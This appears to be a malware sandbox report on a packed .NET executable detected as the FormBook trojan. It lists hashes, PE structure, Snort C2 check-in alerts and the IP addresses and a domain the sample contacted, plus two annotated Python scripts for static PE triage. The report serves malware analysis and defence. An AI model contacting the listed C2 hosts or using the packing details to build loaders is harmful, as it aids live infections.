                                                  Classification:mal100.troj.evad.winEXE@12/1@8/5
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 11% (good quality ratio 9.7%)
                                                  • Quality average: 72%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 95.100.218.79, 95.100.216.89, 2.20.178.33, 2.20.178.24, 40.112.88.60, 20.50.102.62
• Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

Time | Type | Description
19:46:07 | API Interceptor | 2x Sleep call for process: divpCHa0h7.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  No context

                                                  Domains

                                                  No context

                                                  ASN

                                                  No context

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\divpCHa0h7.exe.log
                                                  Process:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1308
                                                  Entropy (8bit):5.348115897127242
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                  MD5:832D6A22CE7798D72609B9C21B4AF152
                                                  SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                  SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                  SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.476049309864918
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:divpCHa0h7.exe
                                                  File size:477696
                                                  MD5:fda0d823b262ac2b1bd76a2053c29692
                                                  SHA1:73f72d7c987d44d1f236c138c5617b527c5ba340
                                                  SHA256:91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
                                                  SHA512:230e3a12c58a61c2348463b5acb92a6b557419b79e0427882750caa84d3c7e8fcec92ff6151f4f22b6eb967da138c931ed56f0dedadf1af1ac5d809508e74507
                                                  SSDEEP:12288:AsXSBAmUT9BbRsXFkN8xDqT2LWWJOxTa:AsCBAme9Bb2Xq8xk2LWx
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:c4b28ed696aa92c0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x45d612
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp:0x6166C8DB [Wed Oct 13 11:54:03 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:v4.0.30319
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
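An added example (not part of the report) that decodes the static PE fields above and runs the checks an analyst makes on them: the link timestamp against the analysis start, the DllCharacteristics flags, and whether the entry point is the standard 32-bit CLR thunk `jmp dword ptr [IAT slot]` that a managed PE32 carries in front of mscoree!_CorExeMain. Two inputs are reconstructed rather than copied: the report prints DllCharacteristics only as flag names, so 0x8540 is the value those four names imply (DYNAMIC_BASE 0x40, NX_COMPAT 0x100, NO_SEH 0x400, TERMINAL_SERVER_AWARE 0x8000), and the bytes FF 25 00 20 40 00 are what the `jmp dword ptr [00402000h]` line in the Entrypoint Preview below disassembles from. The analysis start time is treated as UTC, which the report does not state.

```python
"""Decode and sanity-check static PE facts (added example, not report code)."""
import struct
from datetime import datetime, timezone

# IMAGE_DLLCHARACTERISTICS_* bits from the PE specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH",
    0x0800: "NO_BIND", 0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}


def decode_dll_characteristics(value):
    """Flag names set in a DllCharacteristics word, lowest bit first."""
    return [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if value & bit]


def decode_timestamp(ts):
    """IMAGE_FILE_HEADER.TimeDateStamp as an aware UTC datetime."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def build_age_hours(ts, analysis_start, fmt="%d.%m.%Y %H:%M:%S"):
    """Hours between link time and sandbox start (start assumed UTC)."""
    started = datetime.strptime(analysis_start, fmt).replace(tzinfo=timezone.utc)
    return (started - decode_timestamp(ts)).total_seconds() / 3600


def parse_entry_stub(stub, image_base):
    """Recognise `FF 25 <abs32>` (jmp dword ptr [addr]) at the entry point and
    return the RVA of the IAT slot it jumps through, or None for anything else.
    In a csc-built PE32 assembly this is the thunk to mscoree!_CorExeMain."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return None
    target = struct.unpack_from("<I", stub, 2)[0]
    return target - image_base


def checks(timestamp, dll_chars, stub, image_base, entry_point, analysis_start, signed):
    """Return an ordered list of (check, result) pairs for the sample."""
    age = build_age_hours(timestamp, analysis_start)
    flags = decode_dll_characteristics(dll_chars)
    slot = parse_entry_stub(stub, image_base)
    return [
        ("linked_utc", decode_timestamp(timestamp).isoformat()),
        ("build_age_hours", round(age, 2)),
        ("built_within_24h_of_analysis", 0 <= age < 24),
        ("dep_and_aslr", "NX_COMPAT" in flags and "DYNAMIC_BASE" in flags),
        ("clr_entry_thunk", slot is not None),
        ("iat_slot_rva", slot),
        ("entry_rva", entry_point - image_base),
        ("digitally_signed", signed),
    ]


# Values from the Static PE Info section; DllCharacteristics and stub bytes reconstructed.
SAMPLE_FACTS = dict(timestamp=0x6166C8DB, dll_chars=0x8540,
                    stub=b"\xff\x25\x00\x20\x40\x00", image_base=0x400000,
                    entry_point=0x45D612, analysis_start="13.10.2021 19:45:01",
                    signed=False)

if __name__ == "__main__":
    for name, result in checks(**SAMPLE_FACTS):
        print(f"{name}: {result}")
```

The timestamp decodes to 2021-10-13 11:54:03 UTC, under eight hours before the sandbox run, which is typical of a freshly built crypter stage. Treat this field with care on .NET binaries: Roslyn's deterministic builds write a content hash into TimeDateStamp, so a decoded date is only meaningful when it is plausible, as it is here.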

                                                  Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al    (repeated for the rest of the preview: the bytes after the jmp are 00 00 padding, and 00 00 disassembles as add byte ptr [eax], al)

The jmp dword ptr [00402000h] is the native stub every 32-bit managed executable starts with. 0x402000 is ImageBase (0x400000) plus the IAT RVA (0x2000, size 0x8, see Data Directories): a single import thunk plus its terminator, which the loader fills with the address of mscoree.dll!_CorExeMain, the only import listed below. The CLR then continues from the managed entry point recorded in the metadata, so this stub says nothing about the sample's behaviour. Note where it sits: the entry RVA 0x5d612 is the last 6 bytes of .text (0x2000 + 0x5b618 = 0x5d618), which is why only one real instruction precedes the padding in the preview.

                                                  Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5d5c0          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5e000          0x18ca4       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x78000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x5b618       0x5b800   False     0.880715292008   data       7.77424395601   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x5e000          0x18ca4       0x18e00   False     0.195381202889   data       5.07070154334   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x78000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The .text section is the finding here: 7.77 bits per byte of entropy and a zlib complexity of 0.88 (near-incompressible) across 0x5b800 bytes. Plain CIL and .NET metadata compress well, so most of .text is an encrypted or compressed blob, which is the layout of a managed loader that carries its real payload in an opaque form and unpacks it at runtime. The 12-byte .reloc section holds only the single fixup the entry stub's absolute IAT address needs.

                                                  Resources

Name           RVA      Size     Type (libmagic guess)
RT_ICON        0x5e180  0x468    GLS_BINARY_LSB_FIRST
RT_ICON        0x5e5f8  0x10a8   dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON        0x5f6b0  0x25a8   dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON        0x61c68  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON        0x65ea0  0x10828  dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON  0x766d8  0x4c     data
RT_VERSION     0x76734  0x370    data
RT_MANIFEST    0x76ab4  0x1ea    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

No language or country is set on any resource. The "dBase DBT" and "GLS_BINARY" types are libmagic misfires, not embedded database files: an RT_ICON resource is a raw DIB whose BITMAPINFOHEADER begins with its own size, 40 (0x28), and that byte is what libmagic reports as "next free block index 40". These are ordinary icon images; nothing in the resource directory points at a non-icon payload.

                                                  Imports

DLL          Import
mscoree.dll  _CorExeMain
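The static facts above (the FF 25 entry stub, the 8-byte IAT it jumps through, the populated COM descriptor directory, the near-8.0 entropy of .text and the DllCharacteristics flags) can be checked mechanically. The following script is an added example, not the sandbox's or any vendor's code: a PE32 parser written with only the standard library that extracts those fields, decodes the entry stub and verifies it lands in the IAT, and ranks sections by entropy. Because the analysed file is not available here, the input is a minimal PE32 built in memory by `build_sample_pe32()`, a constructed stand-in that mimics the report's layout (IAT and stub inside .text, uniformly distributed .text bytes, the same four DllCharacteristics flags); replace it with `open(path, "rb").read()` to run against a real sample.

```python
"""Static PE32 triage with the standard library only (added example, not the
sandbox's or any vendor's code). It parses the fields reported under Static PE
Info, measures per-section entropy, decodes the FF 25 entry stub of a managed
executable and checks that it jumps through the IAT. The input is a minimal
PE32 built in memory so the script runs offline: a constructed stand-in that
mimics the report's layout, not the analysed file."""
import math
import struct
from collections import Counter

DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14      # data directory indices (PE/COFF spec)
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
             0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}

def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe32(blob):
    """Return entry point, image base, DllCharacteristics, directories and sections."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", blob, 0x3C)[0]                       # e_lfanew
    if blob[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, pe + 4)
    opt = pe + 24                                                       # optional header
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled")
    entry, base = struct.unpack_from("<I", blob, opt + 16)[0], struct.unpack_from("<I", blob, opt + 28)[0]
    dll_chars, ndirs = struct.unpack_from("<H", blob, opt + 70)[0], struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, raw = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize, "raw": raw,
                         "rsize": rsize, "entropy": shannon_entropy(blob[raw:raw + rsize])})
    return {"entry_rva": entry, "image_base": base, "dll_characteristics": dll_chars,
            "dirs": dirs, "sections": sections}

def section_for_rva(pe, rva):
    return next((s for s in pe["sections"] if s["va"] <= rva < s["va"] + max(s["vsize"], s["rsize"])), None)

def dll_flag_names(pe):
    return sorted(n for bit, n in DLL_FLAGS.items() if pe["dll_characteristics"] & bit)

def is_dotnet(pe):
    """A populated COM descriptor (CLR header) directory marks a managed image."""
    rva, size = pe["dirs"][DIR_COM_DESCRIPTOR]
    return rva != 0 and size != 0

def decode_entry_stub(pe, blob):
    """Operand of `jmp dword ptr [imm32]` (FF 25) at the entry point, else None.
    Managed EXEs begin with exactly this stub; the loader fills the IAT slot it
    reads with the address of mscoree!_CorExeMain."""
    s = section_for_rva(pe, pe["entry_rva"])
    if s is None:
        return None
    off = s["raw"] + pe["entry_rva"] - s["va"]
    return struct.unpack_from("<I", blob, off + 2)[0] if blob[off:off + 2] == b"\xff\x25" else None

def entry_stub_hits_iat(pe, blob):
    """True when the stub's operand lies inside the IAT data directory."""
    target = decode_entry_stub(pe, blob)
    iat_rva, iat_size = pe["dirs"][DIR_IAT]
    return target is not None and iat_rva <= target - pe["image_base"] < iat_rva + iat_size

def high_entropy_sections(pe, threshold=7.0):
    """Sections whose raw bytes look compressed or encrypted."""
    return [s["name"] for s in pe["sections"] if s["entropy"] >= threshold]

def build_sample_pe32():
    """Constructed stand-in: .text holds an 8-byte IAT, 4 KiB of uniformly
    distributed bytes and the FF 25 stub at its very end (as in the report);
    .data is all zeros. DllCharacteristics copy the report's four flags."""
    base, text_va, align, hdr_size = 0x400000, 0x2000, 0x200, 0x200
    iat = struct.pack("<II", 0x1234, 0)                 # one thunk plus terminator
    body = bytes(range(256)) * 16                       # entropy exactly 8.0
    stub = b"\xff\x25" + struct.pack("<I", base + text_va)
    text = iat + body + stub
    text_raw = text + b"\0" * (-len(text) % align)
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (text_va, len(iat)), (text_va + 8, 0x48)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, text_va + len(iat) + len(body))   # entry point = stub
    struct.pack_into("<III", opt, 28, base, 0x1000, align)             # base, section/file align
    struct.pack_into("<HH", opt, 68, 2, 0x8540)    # GUI; NO_SEH|TS_AWARE|DYNAMIC_BASE|NX_COMPAT
    struct.pack_into("<I", opt, 92, 16)
    for i, (rva, size) in enumerate(dirs):
        struct.pack_into("<II", opt, 96 + 8 * i, rva, size)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x6166C8DB, 0, 0, len(opt), 0x0102)
    secs = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_va, len(text_raw), hdr_size, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack("<8sIIIIIIHHI", b".data", 0x200, 0x4000, 0x200, hdr_size + len(text_raw), 0, 0, 0, 0, 0x40000040)
    hdr = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + bytes(opt) + secs
    return hdr + b"\0" * (hdr_size - len(hdr)) + text_raw + b"\0" * 0x200

if __name__ == "__main__":
    blob = build_sample_pe32()
    info = parse_pe32(blob)
    print("managed:", is_dotnet(info), "| flags:", dll_flag_names(info),
          "| entry stub -> %#x, via IAT: %s" % (decode_entry_stub(info, blob), entry_stub_hits_iat(info, blob)))
    for s in info["sections"]:
        print("%-6s va=%#x raw=%#x entropy=%.2f" % (s["name"], s["va"], s["rsize"], s["entropy"]))
```

On the constructed image the entry stub decodes to 0x402000, which falls inside the IAT directory, and .text comes out above 7.5 bits per byte while .data scores 0.0, mirroring the contrast between .text and .reloc in the report. The entropy threshold of 7.0 is a triage heuristic, not a verdict: resource-heavy or already-compressed sections score high for benign reasons, so the check is only meaningful on a code section, as it is here.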

                                                  Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright Gottschalks 2011
Assembly Version  1.0.0.0
InternalName      DateTimeFormatFla.exe
FileVersion       1.0.0.0
CompanyName       Gottschalks
LegalTrademarks
Comments
ProductName       MapEditor1
ProductVersion    1.0.0.0
FileDescription   MapEditor1
OriginalFilename  DateTimeFormatFla.exe

The version resource is attacker-controlled and is not an attribution signal: the InternalName and OriginalFilename (DateTimeFormatFla.exe) do not match the submitted name, and the company/product strings (Gottschalks, MapEditor1) are the kind of filler a builder inserts. They may still be useful for clustering other samples produced by the same builder with the same template.

                                                  Network Behavior

                                                  Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                        Src Port  Dst Port  Source IP      Dest IP
10/13/21-19:47:34.244388  TCP       1201     ATTACK-RESPONSES 403 Forbidden                 80        49767     23.227.38.74   192.168.2.5
10/13/21-19:47:40.620774  ICMP      402      ICMP Destination Unreachable Port Unreachable  -         -         192.168.2.5    8.8.8.8
10/13/21-19:47:40.694370  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49768     80        192.168.2.5    104.165.34.6
10/13/21-19:47:40.694370  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49768     80        192.168.2.5    104.165.34.6
10/13/21-19:47:40.694370  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49768     80        192.168.2.5    104.165.34.6
10/13/21-19:48:01.554977  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49789     80        192.168.2.5    108.167.135.122
10/13/21-19:48:01.554977  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49789     80        192.168.2.5    108.167.135.122
10/13/21-19:48:01.554977  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49789     80        192.168.2.5    108.167.135.122
10/13/21-19:48:12.861304  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)           49812     80        192.168.2.5    8.212.24.67
10/13/21-19:48:12.861304  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)           49812     80        192.168.2.5    8.212.24.67
10/13/21-19:48:12.861304  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)           49812     80        192.168.2.5    8.212.24.67

Three ET signatures (2031412, 2031449, 2031453) fire together on each check-in GET, so the nine FormBook alerts correspond to three requests. SID 1201 is only the Shopify 403 response to the first request, and SID 402 is the guest's own ICMP reply to a late DNS answer (see ICMP Packets), neither of which is attacker traffic. The 19:48:12 session to 8.212.24.67 (www.kangrungao.com via its CNAME a.mb.cn, see DNS Answers) appears here but not in the TCP packet list below, so that list is not exhaustive.

                                                  Network Port Distribution

                                                  TCP Packets

Timestamp                             Src Port  Dst Port  Source IP        Dest IP
Oct 13, 2021 19:47:34.178965092 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:34.196883917 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.197135925 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:34.197210073 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:34.213325977 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244388103 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244424105 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244447947 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244472980 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244493961 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244508982 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244515896 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:34.244524002 CEST  80        49767     23.227.38.74     192.168.2.5
Oct 13, 2021 19:47:34.244680882 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:34.244837999 CEST  49767     80        192.168.2.5      23.227.38.74
Oct 13, 2021 19:47:40.524382114 CEST  49768     80        192.168.2.5      104.165.34.6
Oct 13, 2021 19:47:40.694076061 CEST  80        49768     104.165.34.6     192.168.2.5
Oct 13, 2021 19:47:40.694190025 CEST  49768     80        192.168.2.5      104.165.34.6
Oct 13, 2021 19:47:40.694370031 CEST  49768     80        192.168.2.5      104.165.34.6
Oct 13, 2021 19:47:40.867327929 CEST  80        49768     104.165.34.6     192.168.2.5
Oct 13, 2021 19:47:40.867357969 CEST  80        49768     104.165.34.6     192.168.2.5
Oct 13, 2021 19:47:40.867674112 CEST  49768     80        192.168.2.5      104.165.34.6
Oct 13, 2021 19:47:40.867718935 CEST  49768     80        192.168.2.5      104.165.34.6
Oct 13, 2021 19:47:41.038270950 CEST  80        49768     104.165.34.6     192.168.2.5
Oct 13, 2021 19:47:45.901201963 CEST  49769     80        192.168.2.5      81.169.145.161
Oct 13, 2021 19:47:45.919284105 CEST  80        49769     81.169.145.161   192.168.2.5
Oct 13, 2021 19:47:45.919430017 CEST  49769     80        192.168.2.5      81.169.145.161
Oct 13, 2021 19:47:45.919836998 CEST  49769     80        192.168.2.5      81.169.145.161
Oct 13, 2021 19:47:45.938008070 CEST  80        49769     81.169.145.161   192.168.2.5
Oct 13, 2021 19:47:45.938915014 CEST  80        49769     81.169.145.161   192.168.2.5
Oct 13, 2021 19:47:45.938937902 CEST  80        49769     81.169.145.161   192.168.2.5
Oct 13, 2021 19:47:45.939183950 CEST  49769     80        192.168.2.5      81.169.145.161
Oct 13, 2021 19:47:45.939256907 CEST  49769     80        192.168.2.5      81.169.145.161
Oct 13, 2021 19:47:45.959599018 CEST  80        49769     81.169.145.161   192.168.2.5
Oct 13, 2021 19:47:51.185455084 CEST  49773     80        192.168.2.5      64.190.62.111
Oct 13, 2021 19:47:51.203566074 CEST  80        49773     64.190.62.111    192.168.2.5
Oct 13, 2021 19:47:51.203690052 CEST  49773     80        192.168.2.5      64.190.62.111
Oct 13, 2021 19:47:51.203907013 CEST  49773     80        192.168.2.5      64.190.62.111
Oct 13, 2021 19:47:51.221406937 CEST  80        49773     64.190.62.111    192.168.2.5
Oct 13, 2021 19:47:51.249383926 CEST  80        49773     64.190.62.111    192.168.2.5
Oct 13, 2021 19:47:51.249403954 CEST  80        49773     64.190.62.111    192.168.2.5
Oct 13, 2021 19:47:51.249562025 CEST  49773     80        192.168.2.5      64.190.62.111
Oct 13, 2021 19:47:51.249701023 CEST  49773     80        192.168.2.5      64.190.62.111
Oct 13, 2021 19:47:51.267669916 CEST  80        49773     64.190.62.111    192.168.2.5
Oct 13, 2021 19:48:01.420226097 CEST  49789     80        192.168.2.5      108.167.135.122
Oct 13, 2021 19:48:01.553453922 CEST  80        49789     108.167.135.122  192.168.2.5
Oct 13, 2021 19:48:01.553663969 CEST  49789     80        192.168.2.5      108.167.135.122
Oct 13, 2021 19:48:01.554976940 CEST  49789     80        192.168.2.5      108.167.135.122
Oct 13, 2021 19:48:01.689186096 CEST  80        49789     108.167.135.122  192.168.2.5
Oct 13, 2021 19:48:01.689218998 CEST  80        49789     108.167.135.122  192.168.2.5
Oct 13, 2021 19:48:01.689506054 CEST  49789     80        192.168.2.5      108.167.135.122
Oct 13, 2021 19:48:01.689524889 CEST  49789     80        192.168.2.5      108.167.135.122
Oct 13, 2021 19:48:01.822371960 CEST  80        49789     108.167.135.122  192.168.2.5

                                                  UDP Packets

Timestamp                             Src Port  Dst Port  Source IP    Dest IP
Oct 13, 2021 19:47:34.126564980 CEST  52441     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:47:34.165796995 CEST  53        52441     8.8.8.8      192.168.2.5
Oct 13, 2021 19:47:39.315068960 CEST  62176     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:47:40.339004993 CEST  62176     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:47:40.522993088 CEST  53        62176     8.8.8.8      192.168.2.5
Oct 13, 2021 19:47:40.620671988 CEST  53        62176     8.8.8.8      192.168.2.5
Oct 13, 2021 19:47:45.876126051 CEST  59596     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:47:45.900255919 CEST  53        59596     8.8.8.8      192.168.2.5
Oct 13, 2021 19:47:50.995863914 CEST  63183     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:47:51.184072018 CEST  53        63183     8.8.8.8      192.168.2.5
Oct 13, 2021 19:48:01.289443970 CEST  56969     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:48:01.419078112 CEST  53        56969     8.8.8.8      192.168.2.5
Oct 13, 2021 19:48:06.706549883 CEST  54757     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:48:07.117193937 CEST  53        54757     8.8.8.8      192.168.2.5
Oct 13, 2021 19:48:12.124536991 CEST  49992     53        192.168.2.5  8.8.8.8
Oct 13, 2021 19:48:12.523261070 CEST  53        49992     8.8.8.8      192.168.2.5

                                                  ICMP Packets

Timestamp                             Source IP    Dest IP  Checksum  Code                  Type
Oct 13, 2021 19:47:40.620774031 CEST  192.168.2.5  8.8.8.8  d007      3 (Port unreachable)  Destination Unreachable

